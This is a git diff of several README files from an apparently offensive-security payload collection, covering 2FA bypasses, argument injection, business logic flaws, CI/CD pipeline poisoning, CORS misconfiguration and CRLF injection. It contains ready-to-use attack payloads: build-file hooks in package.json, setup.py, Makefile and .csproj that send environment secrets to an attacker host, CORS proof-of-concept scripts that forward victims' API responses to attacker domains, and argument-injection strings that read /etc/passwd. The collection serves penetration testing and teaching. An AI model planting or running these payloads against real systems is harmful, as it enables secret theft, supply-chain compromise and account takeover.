 If the application redirects to `/my-account` url upon login while 2Fa is disabled, try replacing `/2fa/verify` with `/my-account` while 2FA is enabled to bypass verification.
 ### Bypass 2FA with null or 000000
 Enter the code **000000** or **null** to bypass 2FA protection.
 ### Bypass 2FA with array
 ```json
 {
    "otp":[
        "1234",
        "1111",
        "1337", // GOOD OTP
        "2222",
        "3333",
        "4444",
        "5555"
    ]
 }
 ```
 ## TODO
 * Broken cryptography
 * Session hijacking
 * OAuth misconfiguration
 ## References
 - [10 Password Reset Flaws - Anugrah SR](https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
 - [$6,5k + $5k HTTP Request Smuggling mass account takeover - Slack + Zomato - Bug Bounty Reports Explained](https://www.youtube.com/watch?v=gzM4wWA7RFo&feature=youtu.be)
 - [Broken Cryptography & Account Takeovers - Harsh Bothra - September 20, 2020](https://speakerdeck.com/harshbothra/broken-cryptography-and-account-takeovers?slide=28)
 - [Hacking Grindr Accounts with Copy and Paste - Troy HUNT & Wassime BOUIMADAGHENE - 03 OCTOBER 2020](https://www.troyhunt.com/hacking-grindr-accounts-with-copy-and-paste/)
 - [CTFd Account Takeover](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
 - [2FA simple bypass](https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-simple-bypass)
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -0,0 +1,100 @@
 # Argument Injection
 Argument injection is similar to command injection as tainted data is passed to to a command executed in a shell without proper sanitization/escaping.
 It can happen in different situations, where you can only inject arguments to a command:
 - Improper sanitization (regex)
 - Injection of arguments into a fixed command (PHP:escapeshellcmd, Python: Popen)
 - Bash expansion (ex: *)
 In the following example, a python script takes the inputs from the command line to generate a ```curl``` command:
 ```py
 from shlex import quote,split
 import sys
 import subprocess
 if __name__=="__main__":
    command = ['curl']
    command = command + split(sys.argv[1])
    print(command)
    r = subprocess.Popen(command)
 ```
 It is possible for an attacker to pass several words to abuse options from ```curl``` command
 ```ps1
 python python_rce.py "https://www.google.fr -o test.py" 
 ```
 We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file.
 ```ps1
 ['curl', 'https://www.google.fr', '-o', 'test.py']
 ```
 ## Summary
 * [List of exposed commands](#list-of-exposed-commands)
  * [CURL](#CURL)
  * [TAR](#TAR)
  * [FIND](#FIND)
  * [WGET](#WGET)
 * [References](#references)
 ## List of exposed commands
 ### CURL
 It is possible to abuse ```curl``` through the following options:
 ```ps1
 -o, --output <file>        Write to file instead of stdout
 -O, --remote-name          Write output to a file named as the remote file
 ```
 In case there is already one option in the command it is possible to inject several URLs to download and several output options. Each option will affect each URL in sequence.
 ### TAR
 For the ```tar``` command it is possible to inject arbitrary arguments in different commands. 
 Argument injection can happen into the '''extract''' command:
 ```ps1
 --to-command <command>
 --checkpoint=1 --checkpoint-action=exec=<command>
 -T <file> or --files-from <file>
 ```
 Or in the '''create''' command:
 ```ps1
 -I=<program> or -I <program>
 --use-compres-program=<program>
 ```
 There are also short options to work without spaces:
 ```ps1
 -T<file>
 -I"/path/to/exec"
 ```
 ### FIND
 Find some_file inside /tmp directory.
 ```php
 $file = "some_file";
 system("find /tmp -iname ".escapeshellcmd($file));
 ```
 Print /etc/passwd content.
 ```php
 $file = "sth -or -exec cat /etc/passwd ; -quit";
 system("find /tmp -iname ".escapeshellcmd($file));
 ```
 ### WGET
 Example of vulnerable code
 ```php
 system(escapeshellcmd('wget '.$url));
 ```
 Arbitrary file write
 ```php
 $url = '--directory-prefix=/var/www/html http://example.com/example.php';
 ```
 ## References
 - [staaldraad - Etienne Stalmans, November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/)
 - [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014](https://www.exploit-db.com/papers/33930)
 - [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek,  Apr 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)
--- a/BOOKS.md
+++ b/BOOKS.md
@@ -1,22 +0,0 @@
 # Book's list
 Grab a book and relax, these ones are the best security books (in my opinion).
 - [Web Hacking 101](https://leanpub.com/web-hacking-101)
 - [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
 - [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
 - [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
 - [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
 - [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
 - [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
 - [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
 - [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
 - [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
 - [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
 - [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
 - [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
 - [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
 - [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
 - [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
 - [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
 - [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
--- a/Errors/README.md
+++ b/Errors/README.md
@@ -0,0 +1,71 @@
 # Business Logic Errors
 > Business logic errors, also known as business logic flaws, are a type of application vulnerability that stems from the application's business logic, which is the part of the program that deals with real-world business rules and processes. These rules could include things like pricing models, transaction limits, or the sequences of operations that need to be followed in a multi-step process.
 ## Summary
 * [Examples](#examples)
 * [References](#references)
 ## Examples
 Unlike other types of security vulnerabilities like SQL injection or cross-site scripting (XSS), business logic errors do not rely on problems in the code itself (like unfiltered user input). Instead, they take advantage of the normal, intended functionality of the application, but use it in ways that the developer did not anticipate and that have undesired consequences.
 Common examples of Business Logic Errors.
 * Review Feature Testing
    * Assess if you can post a product review as a verified reviewer without having purchased the item.
    * Attempt to provide a rating outside of the standard scale, for instance, a 0, 6 or negative number in a 1 to 5 scale system.
    * Test if the same user can post multiple ratings for a single product. This is useful in detecting potential race conditions.
    * Determine if the file upload field permits all extensions; developers often overlook protections on these endpoints.
    * Investigate the possibility of posting reviews impersonating other users.
    * Attempt Cross-Site Request Forgery (CSRF) on this feature, as it's frequently unprotected by tokens.
 * Discount Code Feature Testing
    * Try to apply the same discount code multiple times to assess if it's reusable.
    * If the discount code is unique, evaluate for race conditions by applying the same code for two accounts simultaneously.
    * Test for Mass Assignment or HTTP Parameter Pollution to see if you can apply multiple discount codes when the application is designed to accept only one.
    * Test for vulnerabilities from missing input sanitization such as XSS, SQL Injection on this feature.
    * Attempt to apply discount codes to non-discounted items by manipulating the server-side request.
 * Delivery Fee Manipulation
    * Experiment with negative values for delivery charges to see if it reduces the final amount.
    * Evaluate if free delivery can be activated by modifying parameters.
 * Currency Arbitrage
    * Attempt to pay in one currency, for example, USD, and request a refund in another, like EUR. The difference in conversion rates could result in a profit.
 * Premium Feature Exploitation
    * Explore the possibility of accessing premium account-only sections or endpoints without a valid subscription.
    * Purchase a premium feature, cancel it, and see if you can still use it after a refund.
    * Look for true/false values in requests/responses that validate premium access. Use tools like Burp's Match & Replace to alter these values for unauthorized premium access.
    * Review cookies or local storage for variables validating premium access.
 * Refund Feature Exploitation
    * Purchase a product, ask for a refund, and see if the product remains accessible.
    * Look for opportunities for currency arbitrage.
    * Submit multiple cancellation requests for a subscription to check the possibility of multiple refunds.
 * Cart/Wishlist Exploitation
    * Test the system by adding products in negative quantities, along with other products, to balance the total.
    * Try to add more of a product than is available.
    * Check if a product in your wishlist or cart can be moved to another user's cart or removed from it.
 * Thread Comment Testing
    * Check if there's a limit to the number of comments on a thread.
    * If a user can only comment once, use race conditions to see if multiple comments can be posted.
    * If the system allows comments by verified or privileged users, try to mimic these parameters and see if you can comment as well.
    * Attempt to post comments impersonating other users.
 * Parameter Tampering
    * Manipulate payment or other critical fields to alter their values.
    * By exploiting HTTP Parameter Pollution & Mass Assignment, add extra or unexpected fields.
    * Try to manipulate the response to bypass restrictions, such as 2FA.
 ## References
 * [Business logic vulnerability - OWASP](https://owasp.org/www-community/vulnerabilities/Business_logic_vulnerability)
 * [Business logic vulnerabilities - PortSwigger](https://portswigger.net/web-security/logic-flaws)
 * [Examples of business logic vulnerabilities - PortSwigger](https://portswigger.net/web-security/logic-flaws/examples)
--- a/CICD/README.md
+++ b/CICD/README.md
@@ -0,0 +1,328 @@
 # CI/CD attacks
 > CI/CD pipelines are often triggered by untrusted actions such a forked pull requests and new issue submissions for public git repositories.\
 > These systems often contain sensitive secrets or run in privileged environments.\
 > Attackers may gain an RCE into such systems by submitting crafted payloads that trigger the pipelines.\
 > Such vulnerabilities are also known as Poisoned Pipeline Execution (PPE)
 ## Summary
 - [CI/CD attacks](#cicd-attacks)
  - [Summary](#summary)
  - [Tools](#tools)
  - [Package managers & Build Files](#package-managers--build-files)
    - [Javascript / Typescript - package.json](#javascript--typescript---packagejson)
    - [Python - setup.py](#python---setuppy)
    - [Bash / sh - *.sh](#bash--sh---sh)
    - [Maven / Gradle](#maven--gradle)
    - [BUILD.bazel](#buildbazel)
    - [Makefile](#makefile)
    - [Rakefile](#rakefile)
    - [C# - *.csproj](#c---csproj)
  - [CI/CD products](#cicd-products)
    - [GitHub Actions](#github-actions)
    - [Azure Pipelines (Azure DevOps)](#azure-pipelines-azure-devops)
    - [CircleCI](#circleci)
    - [Drone CI](#drone-ci)
    - [BuildKite](#buildkite)
  - [References](#references)
 ## Tools
 * [praetorian-inc/gato](https://github.com/praetorian-inc/gato) - GitHub Self-Hosted Runner Enumeration and Attack Tool
 ## Package managers & Build Files
 > Code injections into build files are CI agnostic and therefore they make great targets when you don't know what system builds the repository, or if there are multiple CI's in the process.\
 > In the examples below you need to either replace the files with the sample payloads, or inject your own payloads into existing files by editing just a part of them.\n
 > If the CI builds forked pull requests then your payload may run in the CI.
 ### Javascript / Typescript - package.json
 > The `package.json` file is used by many Javascript / Typescript package managers (`yarn`,`npm`,`pnpm`,`npx`....).
 > The file may contain a `scripts` object with custom commands to run.\
 `preinstall`, `install`, `build` & `test` are often executed by default in most CI/CD pipelines - hence they are good targets for injection.\
 > If you come across a `package.json` file - edit the `scripts` object and inject your instruction there
 NOTE: the payloads in the instructions above must be `json escaped`.
 Example:
 ```json
 {
  "name": "my_package",
  "description": "",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "set | curl -X POST --data-binary @- {YourHostName}",
    "install": "set | curl -X POST --data-binary @- {YourHostName}",
    "build": "set | curl -X POST --data-binary @- {YourHostName}",
    "test": "set | curl -X POST --data-binary @- {YourHostName}"
  },
  "repository": {
    "type": "git",
    "url": "https://github.com/foobar/my_package.git"
  },
  "keywords": [],
  "author": "C.Norris"
 }
 ```
 ### Python - setup.py
 > `setup.py` is used by python's package managers during the build process.
 It is often executed by default.\
 > Replacing the setup.py files with the following payload may trigger their execution by the CI.
 ```python
 import os
 os.system('set | curl -X POST --data-binary @- {YourHostName}')
 ```
 ### Bash / sh - *.sh
 > Shell scripts in the repository are often executed in custom CI/CD pipelines.\
 > Replacing all the `.sh` files in the repo and submitting a pull request may   trigger their execution by the CI.
 ```shell
 set | curl -X POST --data-binary @- {YourHostName}
 ```
 ### Maven / Gradle
 > These package managers come with "wrappers" that help with running custom commands for building / testing the project.\
 These wrappers are essentially executable shell/cmd scripts.
 Replace them with your payloads to have them executed:
 - `gradlew` 
 - `mvnw`
 - `gradlew.bat` (windows)
 - `mvnw.cmd` (windows)
 > Occasionally the wrappers will not be present in the repository.\
 > In such cases you can edit the `pom.xml` file, which instructs maven what dependencies to fetch and which `plugins` to run.\
 > Some plugins allow code execution, here's an example of the common plugin `org.codehaus.mojo`.\
 > If the `pom.xml` file you're targeting already contains a `<plugins>` instruction then simply add another `<plugin>` node under it.\
 > If if **doesn't** contain a `<plugins>` node then add it under the `<build>` node.
 NOTE: remember that your payload is inserted in an XML document - XML special characters must be escaped.
 ```xml
 <build>
    <plugins>
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>{XML-Escaped-Payload}</   argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
 </build>
 ```
 ### BUILD.bazel
 > Replace the content of `BUILD.bazel` with the following payload
 NOTE: `BUILD.bazel` requires escaping backslashes.\
 Replace any `\` with `\\` inside your payload.
 ```shell
 genrule(
    name = "build",
    outs = ["foo"],
    cmd = "{Escaped-Shell-Payload}",
    visibility = ["//visibility:public"],
 )
 ```
 ### Makefile
 > Make files are often executed by build pipelines for projects written in `C`, `C++` or `Go` (but not exclusively).\
 > There are several utilities that execute `Makefile`, the most common are `GNU Make` & `Make`.\
 > Replace your target  `Makefile` with the following payload
 ```shell
 .MAIN: build
 .DEFAULT_GOAL := build
 .PHONY: all
 all: 
 	set | curl -X POST --data-binary @- {YourHostName}
 build: 
 	set | curl -X POST --data-binary @- {YourHostName}
 compile:
    set | curl -X POST --data-binary @- {YourHostName}
 default:
    set | curl -X POST --data-binary @- {YourHostName}
 ```
 ### Rakefile
 > Rake files are similar to `Makefile` but for Ruby projects.\
 > Replace your target `Rakefile` with the following payload
 ```shell
 task :pre_task do
  sh "{Payload}"
 end
 task :build do
  sh "{Payload}"
 end
 task :test do
  sh "{Payload}"
 end
 task :install do
  sh "{Payload}"
 end
 task :default => [:build]
 ```
 ### C# - *.csproj
 > `.csproj` files are build file for the `C#` runtime.\
 > They are constructed as XML files that contain the different dependencies that are required to build the project.\
 > Replacing all the `.csproj` files in the repo with the following payload may trigger their execution by the CI.
 NOTE: Since this is an XML file - XML special characters must be escaped.
 ```powershell
 <Project>
 <Target Name="SendEnvVariables" BeforeTargets="Build;BeforeBuild;BeforeCompile">
   <Exec Command="powershell -Command &quot;$envBody = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes((Get-ChildItem env: | Format-List | Out-String))); Invoke-WebRequest -Uri {YourHostName} -Method POST -Body $envBody&quot;" />
 </Target>
 </Project>
 ```
 ## CI/CD products
 ### GitHub Actions
 The configuration files for GH actions are located in the directory `.github/workflows/`\
 You can tell if the action builds pull requests based on its trigger (`on`) instructions:
 ```yaml
 on:
  push:
    branches:
      - master
  pull_request:
 ```
 In order to run an OS command in an action that builds pull requests - simply add a `run` instruction to it.\
 An action may also be vulnerable to command injection if it dynamically evaluates untrusted input as part of its `run` instruction:
 ```yaml
 jobs:
  print_issue_title:
    runs-on: ubuntu-latest
    name: Print issue title
    steps:
    - run: echo "${{github.event.issue.title}}"
 ```
 ### Azure Pipelines (Azure DevOps)
 The configuration files for azure pipelines are normally located in the root directory of the repository and called - `azure-pipelines.yml`\
 You can tell if the pipeline builds pull requests based on its trigger instructions. Look for `pr:` instruction:
 ```yaml
 trigger:
  branches:
      include:
      - master
      - refs/tags/*
 pr:
 - master
 ```
 ### CircleCI
 The configuration files for CircleCI builds are located in `.circleci/config.yml`\
 By default - CircleCI pipelines don't build forked pull requests. It's an opt-in feature that should be enabled by the pipeline owners.
 In order to run an OS command in a workflow that builds pull requests - simply add a `run` instruction to the step.
 ```yaml
 jobs:
  build:
    docker:
     - image: cimg/base:2022.05
    steps:
        - run: echo "Say hello to YAML!"
 ```
 ### Drone CI
 The configuration files for Drone builds are located in `.drone.yml`\
 Drone build are often self-hosted, this means that you may gain excessive privileges to the kubernetes cluster that runs the runners, or to the hosting cloud environment. 
 In order to run an OS command in a workflow that builds pull requests - simply add a `commands` instruction to the step.
 ```yaml
 steps:
  - name: do-something
    image: some-image:3.9
    commands:
      - {Payload}
 ```
 ### BuildKite
 The configuration files for BuildKite builds are located in `.buildkite/*.yml`\
 BuildKite build are often self-hosted, this means that you may gain excessive privileges to the kubernetes cluster that runs the runners, or to the hosting cloud environment. 
 In order to run an OS command in a workflow that builds pull requests - simply add a `command` instruction to the step.
 ```yaml
 steps:
  - label: "Example Test"
    command: echo "Hello!"
 ```
 ## References
 * [Poisoned Pipeline Execution](https://www.cidersecurity.io/top-10-cicd-security-risks/poisoned-pipeline-execution-ppe/)
 * [DEF CON 25 - spaceB0x - Exploiting Continuous Integration (CI) and Automated Build systems](https://youtu.be/mpUDqo7tIk8)
 * [Azure-Devops-Command-Injection](https://pulsesecurity.co.nz/advisories/Azure-Devops-Command-Injection)
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -0,0 +1,63 @@
 # CONTRIBUTING
 PayloadsAllTheThings' Team :heart: pull requests :)
 Feel free to improve with your payloads and techniques !
 You can also contribute with a :beers: IRL, or using the sponsor button.
 ## Pull Requests Guidelines
 In order to provide the safest payloads for the community, the following rules must be followed for **every** Pull Request.
 - Payloads must be sanitized
  - Use `id`, and `whoami`, for RCE Proof of Concepts
  - Use `[REDACTED]` when the user has to replace a domain for a callback. E.g: XSSHunter, BurpCollaborator etc.
  - Use `10.10.10.10` and `10.10.10.11` when the payload require IP addresses
  - Use `Administrator` for privileged users and `User` for normal account
  - Use `P@ssw0rd`, `Password123`, `password` as default passwords for your examples
  - Prefer commonly used name for machines such as `DC01`, `EXCHANGE01`, `WORKSTATION01`, etc
 - References must have an `author`, a `title` and a `link`. The `date` is not mandatory but appreciated :)
 ## Techniques Folder
 Every section should contains the following files, you can use the `_template_vuln` folder to create a new technique folder:
 - README.md - vulnerability description and how to exploit it, including several payloads, more below
 - Intruder - a set of files to give to Burp Intruder
 - Images - pictures for the README.md
 - Files - some files referenced in the README.md
 ## README.md format
 Use the following example to create a new technique `README.md` file.
 ```markdown
 # Vulnerability Title
 > Vulnerability description
 ## Summary
 * [Tools](#tools)
 * [Something](#something)
  * [Subentry 1](#sub1)
  * [Subentry 2](#sub2)
 * [References](#references)
 ## Tools
 - [Tool 1](https://example.com)
 - [Tool 2](https://example.com)
 ## Something
 Quick explanation
 ### Subentry 1
 Something about the subentry 1
 ## References
 - [Blog title - Author, Date](https://example.com)
 ```
--- a/Misconfiguration/README.md
+++ b/Misconfiguration/README.md
@@ -0,0 +1,272 @@
 # CORS Misconfiguration
 > A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials. 
 ## Summary
 * [Tools](#tools)
 * [Prerequisites](#prerequisites)
 * [Exploitation](#exploitation)
 * [References](#references)
 ## Tools
 * [s0md3v/Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/)
 * [chenjj/CORScanner - Fast CORS misconfiguration vulnerabilities scanner](https://github.com/chenjj/CORScanner)
 * [PostMessage POC Builder - @honoki](https://tools.honoki.net/postmessage.html)
 * [trufflesecurity/of-cors - Exploit CORS misconfigurations on the internal networks](https://github.com/trufflesecurity/of-cors) 
 ## Prerequisites
 * BURP HEADER> `Origin: https://evil.com`
 * VICTIM HEADER> `Access-Control-Allow-Credential: true`
 * VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null`
 ## Exploitation
 Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`.
 ### Vulnerable Example: Origin Reflection
 #### Vulnerable Implementation
 ```powershell
 GET /endpoint HTTP/1.1
 Host: victim.example.com
 Origin: https://evil.com
 Cookie: sessionid=... 
 HTTP/1.1 200 OK
 Access-Control-Allow-Origin: https://evil.com
 Access-Control-Allow-Credentials: true 
 {"[private API key]"}
 ```
 #### Proof of concept
 This PoC requires that the respective JS script is hosted at `evil.com`
 ```js
 var req = new XMLHttpRequest(); 
 req.onload = reqListener; 
 req.open('get','https://victim.example.com/endpoint',true); 
 req.withCredentials = true;
 req.send();
 function reqListener() {
    location='//atttacker.net/log?key='+this.responseText; 
 };
 ```
 or 
 ```html
 <html>
     <body>
         <h2>CORS PoC</h2>
         <div id="demo">
             <button type="button" onclick="cors()">Exploit</button>
         </div>
         <script>
             function cors() {
             var xhr = new XMLHttpRequest();
             xhr.onreadystatechange = function() {
                 if (this.readyState == 4 && this.status == 200) {
                 document.getElementById("demo").innerHTML = alert(this.responseText);
                 }
             };
              xhr.open("GET",
                       "https://victim.example.com/endpoint", true);
             xhr.withCredentials = true;
             xhr.send();
             }
         </script>
     </body>
 </html>
 ```
 ### Vulnerable Example: Null Origin
 #### Vulnerable Implementation
 It's possible that the server does not reflect the complete `Origin` header but
 that the `null` origin is allowed. This would look like this in the server's
 response:
 ```
 GET /endpoint HTTP/1.1
 Host: victim.example.com
 Origin: null
 Cookie: sessionid=... 
 HTTP/1.1 200 OK
 Access-Control-Allow-Origin: null
 Access-Control-Allow-Credentials: true 
 {"[private API key]"}
 ```
 #### Proof of concept
 This can be exploited by putting the attack code into an iframe using the data
 URI scheme. If the data URI scheme is used, the browser will use the `null`
 origin in the request:
 ```html
 <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script>
  var req = new XMLHttpRequest();
  req.onload = reqListener;
  req.open('get','https://victim.example.com/endpoint',true);
  req.withCredentials = true;
  req.send();
  function reqListener() {
    location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText);
   };
 </script>"></iframe> 
 ```
 ### Vulnerable Example: XSS on Trusted Origin
 If the application does implement a strict whitelist of allowed origins, the
 exploit codes from above do not work. But if you have an XSS on a trusted
 origin, you can inject the exploit coded from above in order to exploit CORS
 again.
 ```
 https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
 ```
 ### Vulnerable Example: Wildcard Origin `*` without Credentials
 If the server responds with a wildcard origin `*`, **the browser does never send
 the cookies**. However, if the server does not require authentication, it's still
 possible to access the data on the server. This can happen on internal servers
 that are not accessible from the Internet. The attacker's website can then 
 pivot into the internal network and access the server's data without authentication.
 ```powershell
 * is the only wildcard origin
 https://*.example.com is not valid
 ```
 #### Vulnerable Implementation
 ```powershell
 GET /endpoint HTTP/1.1
 Host: api.internal.example.com
 Origin: https://evil.com
 HTTP/1.1 200 OK
 Access-Control-Allow-Origin: *
 {"[private API key]"}
 ```
 #### Proof of concept
 ```js
 var req = new XMLHttpRequest(); 
 req.onload = reqListener; 
 req.open('get','https://api.internal.example.com/endpoint',true); 
 req.send();
 function reqListener() {
    location='//atttacker.net/log?key='+this.responseText; 
 };
 ```
 ### Vulnerable Example: Expanding the Origin / Regex Issues
 Occasionally, certain expansions of the original origin are not filtered on the server side. This might be caused by using a badly implemented regular expressions to validate the origin header.
 #### Vulnerable Implementation (Example 1)
 In this scenario any prefix inserted in front of `example.com` will be accepted by the server. 
 ```
 GET /endpoint HTTP/1.1
 Host: api.example.com
 Origin: https://evilexample.com
 HTTP/1.1 200 OK
 Access-Control-Allow-Origin: https://evilexample.com
 Access-Control-Allow-Credentials: true 
 {"[private API key]"}
 ```
 #### Proof of concept (Example 1)
 This PoC requires the respective JS script to be hosted at `evilexample.com`
 ```js
 var req = new XMLHttpRequest(); 
 req.onload = reqListener; 
 req.open('get','https://api.example.com/endpoint',true); 
 req.withCredentials = true;
 req.send();
 function reqListener() {
    location='//atttacker.net/log?key='+this.responseText; 
 };
 ```
 #### Vulnerable Implementation (Example 2)
 In this scenario the server utilizes a regex where the dot was not escaped correctly. For instance, something like this: `^api.example.com$` instead of `^api\.example.com$`. Thus, the dot can be replaced with any letter to gain access from a third-party domain.
 ```
 GET /endpoint HTTP/1.1
 Host: api.example.com
 Origin: https://apiiexample.com
 HTTP/1.1 200 OK
 Access-Control-Allow-Origin: https://apiiexample.com
 Access-Control-Allow-Credentials: true 
 {"[private API key]"}
 ```
 #### Proof of concept (Example 2)
 This PoC requires the respective JS script to be hosted at `apiiexample.com`
 ```js
 var req = new XMLHttpRequest(); 
 req.onload = reqListener; 
 req.open('get','https://api.example.com/endpoint',true); 
 req.withCredentials = true;
 req.send();
 function reqListener() {
    location='//atttacker.net/log?key='+this.responseText; 
 };
 ```
 ## Labs
 * [CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack)
 * [CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack)
 * [CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack)
 * [CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack)
 ## Bug Bounty reports
 * [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
 * [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147)
 * [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200)
 * [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249)
 * [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298)
 ## References
 * [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
 * [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
 * [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
 * [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)
 * [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors)
 * [CORS Misconfigurations Explained - Detectify Blog](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -1,20 +1,29 @@
-# CRLF
+# Carriage Return Line Feed
-The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
+> The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
-A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
+> A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
 ## Summary
 - [CRLF - Add a cookie](#crlf---add-a-cookie)
 - [CRLF - Add a cookie - XSS Bypass](#crlf---add-a-cookie---xss-bypass)
 - [CRLF - Write HTML](#crlf---write-html)
 - [CRLF - Filter Bypass](#crlf---filter-bypass)
 - [Labs](#labs)
 - [References](#references)
 ## CRLF - Add a cookie
 Requested page
-```powershell
+```http
 http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue
 ```
 HTTP Response
-```powershell
+```http
 Connection: keep-alive
 Content-Length: 178
 Content-Type: text/html
@@ -37,7 +46,7 @@ http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
 HTTP Response
-```powershell
+```http
 HTTP/1.1 200 OK
 Date: Tue, 20 Dec 2016 14:34:03 GMT
 Content-Type: text/html; charset=utf-8
@@ -62,13 +71,13 @@ X-XSS-Protection:0
 ```http
 http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
 ```
-```powershell
+
 HTTP response
 ```http
 Set-Cookie:en
 Content-Length: 0
-```powershell
+
 HTTP/1.1 200 OK
 Content-Type: text/html
 Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT
@@ -84,7 +93,7 @@ Content-Length: 34
 %E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
 ```
-```powershell
+Remainder:
 * %E5%98%8A = %0A = \u560a
 * %E5%98%8D = %0D = \u560d
